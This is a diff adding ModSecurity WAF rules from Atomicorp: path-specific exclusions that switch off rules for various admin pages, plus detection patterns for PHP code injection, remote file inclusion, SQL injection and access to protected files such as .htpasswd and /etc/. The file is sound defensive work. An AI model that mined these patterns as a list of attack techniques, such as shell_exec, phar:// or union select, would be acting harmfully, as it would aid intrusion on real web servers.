+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/direct/|!ARGS:/thumb/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370156,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91692
+
+SecRule REQUEST_FILENAME "/admin/layout/edit/" "phase:2,id:91693,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020"
+SecAction "phase:2,id:91694,t:none,pass,nolog,skipAfter:END_RULES_91694"
+
+SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:filecontent|!ARGS:/template/|!ARGS:/header/|!ARGS:/^layout/  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|decode_base64|str_rot13|php_uname|file_get_contents|include|require|require_once|parse_ini_file|shell_exec|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|include|php_uname|preg_\w+|execute)\s*[\"\(@]"  "phase:2,deny,log,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt',id:370157,rev:1,logdata:'%{TX.0}',severity:'2'"
+
+SecMarker END_RULES_91694
+
+SecRule REQUEST_FILENAME "/edit_behaviour\.php" "phase:2,id:91695,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126"
+
+SecRule REQUEST_FILENAME "/otrs/index\.pl" "phase:2,id:91696,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340008,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020"
+
+SecRule REQUEST_FILENAME "/content/edit/" "phase:2,id:91697,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/ises/config\.php" "phase:2,id:91698,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91699,t:none,pass,nolog,skipAfter:END_RULES_91699"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^func_key/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:360663,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^func_key/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:360664,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91699
+
+SecRule REQUEST_FILENAME "/cacti/data_input\.php" "phase:2,id:91700,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cgi-bin/bmailercp\.cgi" "phase:2,id:91701,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin\.php" "phase:2,id:91702,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340195,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028"
+
+SecRule REQUEST_FILENAME "/control_panel\.php" "phase:2,id:91703,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:91704,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340159"
+SecAction "phase:2,id:91705,t:none,pass,nolog,skipAfter:END_RULES_91705"
+
+SecRule ARGS|XML:/*|!ARGS:data|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:content  "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|(?:execute|convert)\(|; ?delete.*;(?:insert|declare|varchar)|and .* \( ?select |(?:drop|create)(\w+)table|(?:declare|convert) .* varchar\(|null ?, ?(?:null ?, ?(?:accesslevel|user_name)) ?,|concat\(|union select |union all select|\b\W*?cast\b\W*?\(.* as |xecresultset|' ?; ?declare\b\W*?|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)"                 "phase:2,deny,log,auditlog,status:403,capture,id:360665,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:28,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch"
+
+SecMarker END_RULES_91705
+
+SecRule REQUEST_FILENAME "/css/gallery-css\.php" "phase:2,id:91706,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/rcv_paypal\.php" "phase:2,id:91707,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095"
+SecAction "phase:2,id:91708,t:none,pass,nolog,skipAfter:END_RULES_91708"
+
+SecRule ARGS|!ARGS:/item_name/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:message|!ARGS:email|!ARGS:/description/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|serialize|php_uname|phpinfo|preg_\w+|shell_exec|exec|eval|create_function|system) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:360666,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP attack in Argument',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91708
+
+SecRule REQUEST_FILENAME "/upload_crop\.php" "phase:2,id:91709,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/admin/generic_edit\.php" "phase:2,id:91710,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/edit_workshops\.php" "phase:2,id:91711,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126"
+SecAction "phase:2,id:91712,t:none,pass,nolog,skipAfter:END_RULES_91712"
+
+SecRule ARGS|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:message|!ARGS:email|!ARGS:/description/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|preg_\w+|shell_exec|exec|system) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:360667,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP attack in Argument',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91712
+
+SecRule REQUEST_FILENAME "/collect_db\.php" "phase:2,id:91713,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/a__iiconcreatelive\.php" "phase:2,id:91714,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91715,t:none,pass,nolog,skipAfter:END_RULES_91715"
+
+SecRule ARGS|!ARGS:contentfrom "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:360668,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:contentfrom "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:360669,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91715
+
+SecRule REQUEST_FILENAME "/etc/get_testimonial\.php" "phase:2,id:91716,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/_vti_bin/_vti_aut/author\.exe" "phase:2,id:91717,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390709"
+SecAction "phase:2,id:91718,t:none,pass,nolog,skipAfter:END_RULES_91718"
+
+
+#Protected file upload protection
+SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/* "@pm .www_acl .htpasswd .htaccess boot.ini httpd.conf /etc/ .htgroup .wwwacl .history .bash_history" "id:333851,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334397,t:none,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_SPEC_1"
+
+SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:tiny_vals|!ARGS:/description/|!ARGS:content|!ARGS:/keyword/|!ARGS:/desc/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/search/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:/data/ "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|httpd\.conf|boot\.ini)\b|\/etc\/|/\.(?:history|bash_history|sh_history)$)" "phase:2,deny,status:403,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'360670',rev:14,logdata:'%{TX.0}',severity:'2'"
+
+SecRule REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|httpd\.conf|boot\.ini)\b|\/etc\/|/\.(?:history|bash_history|sh_history)$)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'360671',rev:6,logdata:'%{TX.0}',severity:'2'"
+
+#
+SecMarker END_FILE_PROTECTION_SPEC_1
+
+SecMarker END_RULES_91718
+
+SecRule REQUEST_FILENAME "/admin/reclame\.php" "phase:2,id:91719,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/install/itron\.php" "phase:2,id:91720,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/editcode\.php" "phase:2,id:91721,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/query_highlighted_block\.php" "phase:2,id:91722,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91723,t:none,pass,nolog,skipAfter:END_RULES_91723"
+
+SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:360672,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:360673,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91723
+
+SecRule REQUEST_FILENAME "/query_block_highlight\.php" "phase:2,id:91724,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91725,t:none,pass,nolog,skipAfter:END_RULES_91725"
+
+SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:360674,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:360675,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91725
+
+SecRule REQUEST_FILENAME "/query_block\.php" "phase:2,id:91726,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91727,t:none,pass,nolog,skipAfter:END_RULES_91727"
+
+SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:360676,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:360677,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91727
+
+SecRule REQUEST_FILENAME "/shopadmin/index\.php" "phase:2,id:91728,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cms/rss\.php" "phase:2,id:91729,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/cms-edit\.php" "phase:2,id:91730,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/manufacturers\.php" "phase:2,id:91731,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/eventaddaction\.php" "phase:2,id:91732,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/settings/customerror" "phase:2,id:91733,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/edit_design\.php" "phase:2,id:91734,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/api\.php" "phase:2,id:91735,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/editresult_listing\.php" "phase:2,id:91736,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/products_product_process\.php" "phase:2,id:91737,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin_prod\.php" "phase:2,id:91738,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/editproperty_process\.php" "phase:2,id:91739,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/sections_process\.php" "phase:2,id:91740,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
